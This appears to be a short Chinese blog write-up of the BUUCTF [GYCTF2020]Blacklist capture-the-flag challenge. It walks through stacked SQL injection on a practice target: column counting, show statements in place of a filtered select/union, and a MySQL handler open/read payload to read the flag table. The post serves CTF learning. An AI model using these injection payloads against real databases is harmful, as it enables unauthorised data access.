BUUCTF [GYCTF2020]Blacklist 堆叠注入(show代替select与handler的使用)

打开靶机

先判断列数

 

order by到五列时报错,一共四列

用union爆一下库,发现被过滤

 

那就用前面说过的,show databases,show tables,show columns from 'table_name',把库一一爆出来

 

 

 

 找到了flag,但是union被过滤了,那就要用到handler了

 

 handler `table_name` open as p;handler p read first;handler p close;#表名要用反引号框起来

 

得到了flag

 

posted @ 2021-08-02 23:49  Dixk-BXy  阅读(166)  评论(0编辑  收藏  举报
Live2D